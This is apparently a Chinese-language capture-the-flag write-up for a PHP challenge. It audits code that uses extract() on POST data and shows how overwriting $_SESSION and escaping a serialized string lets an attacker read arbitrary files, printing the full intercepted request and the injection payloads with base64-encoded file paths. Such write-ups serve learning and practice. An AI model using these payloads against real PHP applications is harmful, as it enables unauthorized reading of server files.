打开题目,看到一串php代码,试着代码审计一下,看一下有用信息
可以看出是通过$_SESSION['img']来读取文件
extract可以将数组中的变量导入当前变量表
也就是说我们可以伪造$_SESSION 数组中的所有数据
这里传递一个参数f=phpinfo
先用hackbar进行post传参试试
然后直接抓包
POST /index.php HTTP/1.1
Host: 8fc7bd3e-f31b-4ff2-87e7-a4722b83e2ed.node5.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
Origin: http://8fc7bd3e-f31b-4ff2-87e7-a4722b83e2ed.node5.buuoj.cn:81
Connection: close
Referer: http://8fc7bd3e-f31b-4ff2-87e7-a4722b83e2ed.node5.buuoj.cn:81/index.php?f=highlight_file
Upgrade-Insecure-Requests: 1
_SESSIONuser=flagflagflagflagflagphp&_SESSIONfunction=";s:8:"function";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}&function=show_image
post传参
_SESSIONuser=flagflagflagflagflagphp&_SESSIONfunction=";s:8:"function";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}&function=show_image,逃逸
对d0g3_f1ag.php进行base64编码得到ZDBnM19mMWFnLnBocA==,填入burp
读取
替换编码_SESSIONuser=flagflagflagflagflagphp&_SESSIONfunction=";s:8:"function";s:1:"1";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}&function=show_image得到flag